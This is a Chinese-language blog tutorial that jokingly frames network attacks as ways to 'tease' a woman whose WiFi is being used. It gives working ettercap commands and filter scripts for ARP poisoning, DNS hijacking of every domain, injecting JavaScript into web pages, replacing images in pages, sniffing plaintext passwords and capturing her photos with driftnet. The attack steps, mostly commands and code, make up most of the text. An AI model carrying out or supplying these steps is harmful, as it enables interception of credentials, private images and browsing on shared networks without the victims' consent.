关于毒化内网DNS劫持搞事情

前言:

作为单身狗,你就甘心拿着笔记本蹭着垃圾WiFi聊天刷微博吗?

来自单身狗的怨念告诉我们:不,我们要搞事情!!!(蹭着妹纸的WiFi顺手调戏之,才是王道~)

做案工具:

Kali Linux(咳咳,开始。。。)

正文:

1、首先是安装个ettercap

sudo apt-get install ettercap

2、咱们来弹个窗吧~

这个我们一般用alert的filter脚本

if(ip.proto==TCP&&tcp.dst==80){

if(search(DATA.data,"Accept-Encoding")){

replace("Accept-Encoding","Accept-Rubbish!");

#note:replacementstringissamelengthasoriginalstring

#msg("zapped Accept-Encoding!\n");

}

}

if(ip.proto==TCP&&tcp.src==80){

replace("","alert("hello,ichunqiu!");");

replace("","alert("hello,ichunqiu!");");

msg("OK!!\n");

}

3、先编译成程序识别的文件

etterfilter alert.filter -o alert.ef

4、然后在命令中加载(实际测试命令行有bug,请在图形化界面使用ettercap -G)

ettercap -T -q -i eth0 -F alert.ef -M arp:remote -P dns_spoof /// ///

5、然后当妹子打开浏览器上个网页就。。

6、当然也可以替换网页中的图片,比如换了百度的logo,但这并没有好大意义。

if(ip.proto==TCP&&tcp.dst==80){

if(search(DATA.data,"Accept-Encoding")){

replace("Accept-Encoding","Accept-Rubbish!");

#note:replacementstringissamelengthasoriginalstring

#msg("zapped Accept-Encoding!\n");

}

}

if(ip.proto==TCP&&tcp.src==80){

replace("img src=","img src=http://pic2016.5442.com:82/2016/0909/45/2.jpg!960.jpg;");

replace("IMG SRC=","img src=http://pic2016.5442.com:82/2016/0909/45/2.jpg!960.jpg");

msg("ok!!\n");

}

当然你可以来玩些其他的东西~

1、想邪恶的抓取妹子某些网站的某些明文密码吗?

ettercap嗅探吧

ifconfig得到kali的网卡,例:eth0,然后

sudo ettercap -i eth0 -Tq -M arp:remote /// ///

比如说wordpress博客明文密码被截取

2、想给妹子推送表白网页吗

这里用到DNS劫持

先搭建个表白网页,如在:192.168.1.102

修改ettercap的DNS配置文件

sudo vim /etc/ettercap/etter.dns

最后的注释上面加上

* A 192.168.1.102

即把所有域名解析到这个ip

然后加载dns_spoof插件开始欺骗

ettercap -T -i wlan0 -q -P dns_spoof /// ///

为什么我是单身狗,因为我就算DNS劫持也没有表白!!!

3、想截取妹子的社交照片吗

这用ettercap配合driftnet是极好的

还是先来嗅探

sudo ettercap -i eth0 -Tq -M arp:remote /// ///

然后

sudo driftnet -i eth0 -b -a

解释下这几个参数

-i 监听网卡

-b 声音提醒

-a 保存图片(这样的话图片不会显示在)

-d 图片保存目录,例:driftnet -i eth0 -b -a -d /pic

看图,误差在于缓存的图片不再加载,我测试聊天记录图片也被读取了。。这个比较6

文中所讲都为毒化整个内网,测试需要谨慎,有可能会造成整个内网网络异常,如果你在办公室,不怕被打死,可以试试。

你可能感兴趣的:(关于毒化内网DNS劫持搞事情)